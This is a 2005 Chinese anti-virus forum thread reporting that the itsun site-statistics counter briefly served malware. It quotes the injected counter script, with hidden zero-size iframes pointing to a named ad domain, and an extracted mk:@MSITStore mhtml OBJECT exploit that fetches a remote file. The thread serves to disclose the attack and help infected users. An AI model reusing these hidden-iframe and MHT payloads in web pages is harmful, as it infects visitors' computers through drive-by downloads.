瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 itsun统计器今天凌晨放置病毒!中毒后多了一个进程ptool32.exe

12   1  /  2  页   跳转

itsun统计器今天凌晨放置病毒!中毒后多了一个进程ptool32.exe

收藏
ikakazzz
头像
初生襁褓狮
  • 帖子:5
  • 注册: 2005-10-05
  • 来自:
发表于: 2005-10-05 20:24 | 只看楼主 短消息 资料
字号: 1楼

itsun统计器今天凌晨放置病毒!中毒后多了一个进程ptool32.exe

我是某网站的站长,在我网站上放的国内较权威统计器,www.itsun.com提供的!
下面是引用站长站的一个站长的贴子!我们共同证明这是个恶意脚本!中毒后多了一个进程ptool32.exe

http://bbs.chinaz.com/dispbbs.asp?boardID=27&ID=466300&page=1

itsun统计器今天凌晨放置病毒,大约放了几十分钟!临时文件夹的counter[1].php文件含有以下代码

=============================================================================================

document.open();
document.write('<a href=http://report.itsun.com/stats/index.jsp?uuid=XXXXXX target=_blank title=ITSUN-中国最专业的免费流量统计 style=font-size:9pt;>[ITSUN统计]</a>');
var cookieString = new String(document.cookie);
var cookieHeader = "Cookie_itsun=" ;
var beginPosition = cookieString.indexOf(cookieHeader) ;
if (beginPosition == -1){
var Then = new Date() ;
var hours = Then.getHours();
var minutes = Then.getMinutes();
var seconds = Then.getSeconds();
var lefttime = 1000 * ( 86400 - hours*3600 - minutes*60 - seconds);
Then.setTime(Then.getTime() + lefttime );
document.cookie = "Cookie_itsun=y;expires="+ Then.toGMTString() +"; path=/";
var fromr=top.document.referrer;
fromr=(fromr=="")?document.referrer:fromr;
var c_page=top.location.href;
c_page = c_page =="" ? location.href : c_page;
var query = '&c_page=' + escape(c_page) + '&refer1=' + escape(fromr) + '&c_screen=' + screen.width+ 'x'+screen.height;
document.write('<IFRAME width="0" height="0" marginwidth="0" marginheight="0" frameborder="0" src="http://61.152.108.137\:89/count2.php?uuid=xxxxxx&ip1=xxx.xx.xx.xx'+ query + '"></iframe>');
document.write('<iframe SRC=http://www.jl114.com/ads/ width=0 height=0 marginwidth=0 marginheight=0 frameborder=0></iframe>');}
document.close();
===========================================================================================

http://www.jl114.com/ads/ 里含有病毒,放置时间大概从0:30-1:30之间,想不到这么一个有名的网站也开始放置病毒了,真伤心,我用了大半年了呢。

最后编辑2005-10-09 08:55:23
分享到:
gototop
 
ikakazzz
头像
初生襁褓狮
  • 帖子:5
  • 注册: 2005-10-05
  • 来自:
发表于: 2005-10-05 20:28 | 只看楼主 短消息 资料
字号: 2楼

http://forum.ikaka.com/topic.asp?board=67&artid=7258016

代码提取
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.jl114.com/ads/lmhelp.txt::/%23%2E%68%74m"></OBJECT>

多了个进程ptool32.exe

瑞星杀毒监控中心自动关闭后起动不了!
gototop
 
郁闷肚肚
头像
初生襁褓狮
  • 帖子:33
  • 注册: 2004-12-06
  • 来自:
发表于: 2005-10-05 20:48 | 短消息 资料
字号: 3楼

是网站他们放的,还是别人进服务器放的可不好说.
不过那段iframe和chm帮助文件的漏洞只要打好相关补丁就不会中毒的。
现在的问题在于太多windows系统用户不会打补丁或是是D版无法打补丁,这是目前病毒传播的一个很好的环境
gototop
 
魔法学徒
头像
卡卡技术团队
  • 帖子:11465
  • 注册: 2004-10-03
  • 来自:
发表于: 2005-10-05 21:57 | 短消息 资料
字号: 4楼

感谢分享
gototop
 
叛逆的超人
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2005-10-08
  • 来自:
发表于: 2005-10-08 18:11 | 短消息 资料
字号: 5楼

那怎么把他解决呢,我的电脑也中了啊
gototop
 
飞跃迷离
头像
社区嘉宾
  • 帖子:7351
  • 注册: 2004-10-15
  • 来自:
发表于: 2005-10-08 18:56 | 短消息 资料
字号: 6楼

【回复“叛逆的超人”的帖子】
建议您下载并使用HijackThis1.99.1

HijackThis下载地址请参考:
【必读】本版说明及常用小软件下载
http://forum.ikaka.com/topic.asp?board=67&artid=5188931

HijackThis的使用方法-----请参考--瑞星HijackThis专题
http://it.rising.com.cn/newSite/Channels/anti_virus/Antivirus_Faq/TopicExplorerPagePackage/hijackthis.htm

运行HijackThis,先点[扫描]或[Scan]按钮,扫描完成后,[扫描]或[Scan]按钮会变为[保存Log]或[Save Log]按钮,点击它,LOG将会在记事本中显示,再从记事本里复制/粘贴到贴子里。
如果LOG比较长,一贴发不完,你可以分成几个部分发在回贴里。
gototop
 
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2005-10-08 19:31 | 短消息 资料
字号: 7楼

Exploit.HTML.Mht

现在还有
gototop
 
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2005-10-08 19:33 | 短消息 资料
字号: 8楼

mk:@MSITStore:mhtml:c:\.mht!http://www.jl114.com/ads/lmhelp.txt::/#.htm
gototop
 
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2005-10-08 19:36 | 短消息 资料
字号: 9楼

gototop
 
海色の月
头像
社区嘉宾
  • 帖子:776
  • 注册: 2004-04-01
  • 来自:
发表于: 2005-10-08 23:46 | 短消息 资料
字号: 10楼

前几天去过一次,随便写了点……
http://ylsmqss.blogchina.com/3133810.html
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT